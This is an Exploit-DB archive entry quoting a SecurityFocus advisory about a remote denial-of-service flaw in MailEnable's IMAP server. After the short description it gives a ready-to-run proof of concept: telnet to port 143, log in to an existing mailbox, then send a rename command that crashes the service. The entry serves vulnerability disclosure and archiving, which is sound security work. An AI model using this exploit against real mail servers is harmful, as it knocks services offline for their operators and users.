exploit-db-mirror/exploits/windows/dos/26575.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

13 lines
No EOL
443 B
Text

source: https://www.securityfocus.com/bid/15556/info
MailEnable is prone to a remote denial of service vulnerability.
The vulnerability presents itself when a user issues a malicious rename request following authentication.
Remote attackers can exploit this issue to trigger a denial of service condition.
telnet localhost 143
a1 login josh byebye
a2 rename foo bar
where josh and byebye are the login credentials for an existing mailbox.